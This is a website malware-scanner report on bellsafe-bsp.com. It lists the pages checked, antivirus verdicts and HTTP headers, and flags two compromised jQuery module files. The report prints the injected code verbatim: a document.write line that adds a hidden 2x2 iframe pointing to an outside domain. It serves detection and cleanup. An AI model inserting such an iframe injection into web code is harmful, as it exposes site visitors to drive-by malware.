New scan:

Malware Scanner report for bellsafe-bsp.com

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "bellsafe-bsp.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/3/3
3 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bellsafe-bsp.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bellsafe-bsp.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://bellsafe-bsp.com/
200 OK
Content-Length: 26634
Content-Type: text/html
clean
http://bellsafe-bsp.com/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/modules/mod_swmenufree/jquery-1.6.min.js
200 OK
Content-Length: 90675
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044></iframe>');

(function(a,b){function cw(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function ct(a){if(!ch[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ci||(ci=c.createElement("iframe"),ci.frameBorder=ci.width=ci.height=0),c.body.appendChild(ci);if(!cj|
... 3202 bytes are skipped ...
b){var c=f(this);c[d](a.call(this,b,c[d]()))});if(f.isWindow(e)){var g=e.document.documentElement["client"+c];return e.document.compatMode==="CSS1Compat"&&g||e.document.body["client"+c]||g}if(e.nodeType===9)return Math.max(e.documentElement["client"+c],e.body["scroll"+c],e.documentElement["scroll"+c],e.body["offset"+c],e.documentElement["offset"+c]);if(a===b){var h=f.css(e,d),i=parseFloat(h);return f.isNaN(i)?h:i}return this.css(d,typeof a=="string"?a:a+"px")}}),a.jQuery=a.$=f})(window);

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AML [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
Fortinet
JS/Iframe.JG!tr
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

Hidden iFrame found.
size: 2x2     
src: http://turf-times.de/wwcf.html?j=620044

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044>

http://bellsafe-bsp.com/modules/mod_swmenufree/jquery.corner.js
200 OK
Content-Length: 11424
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044></iframe>');

;(function($) {
var style = document.createElement('div').style,
moz = style['MozBorderRadius'] !== undefined,
webkit = style['WebkitBorderRadius'] !== undefined,
radius = style['borderRadius'] !== undefined || style['BorderRadius'] !== undefined,
mode = document.documentMode || 0,
... 3451 bytes are skipped ...
d.appendChild($vert[0]);
}
}
}
}
});
};
$.fn.uncorner = function() {
if (radius || moz || webkit)
this.css(radius ? 'border-radius' : moz ? '-moz-border-radius' : '-webkit-border-radius', 0);
$('div.jquery-corner', this).remove();
return this;
};
$.fn.corner.defaults = {
useNative: true, metaAttr: 'data-corner' };

})(jQuery);

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://turf-times.de/wwcf.html?j=620044

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044>

http://bellsafe-bsp.com/modules/mod_swmenufree/transmenu_Packed.js
200 OK
Content-Length: 16378
Content-Type: application/javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://turf-times.de/wwcf.html?j=620044

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wwcf.html?j=620044>

http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery-1.6.1.min.js
200 OK
Content-Length: 91342
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery.mobile-1.0rc2.customized.min.js
200 OK
Content-Length: 48433
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery.easing.1.3.js
200 OK
Content-Length: 8097
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/jquery.hoverIntent.minified.js
200 OK
Content-Length: 1464
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/modules/mod_iNowSlider/js/diapo.js
200 OK
Content-Length: 39799
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/modules/mod_jqueryimagescroller/assets/js/jquery.min.js
200 OK
Content-Length: 91427
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/modules/mod_jqueryimagescroller/assets/js/scroll.js
200 OK
Content-Length: 4114
Content-Type: application/javascript
clean
http://bellsafe-bsp.com/home.html
200 OK
Content-Length: 26588
Content-Type: text/html
clean
http://bellsafe-bsp.com/empresa.html
200 OK
Content-Length: 18111
Content-Type: text/html
clean
http://bellsafe-bsp.com/productos.html
200 OK
Content-Length: 18628
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bellsafe-bsp.com

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 12 Sep 2014 17:53:26 GMT
Pragma: no-cache
Server: Apache/2.4.9 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 12 Sep 2014 17:53:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 318638a6bbd7aefa12c971ea55359778=bb8dcf83956991cd602068a1d6fd2f75; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: bellsafe-bsp.com
Referer: http://www.google.com/search?q=bellsafe-bsp.com

Result:
The result is similar to the first query. There are no suspicious redirects found.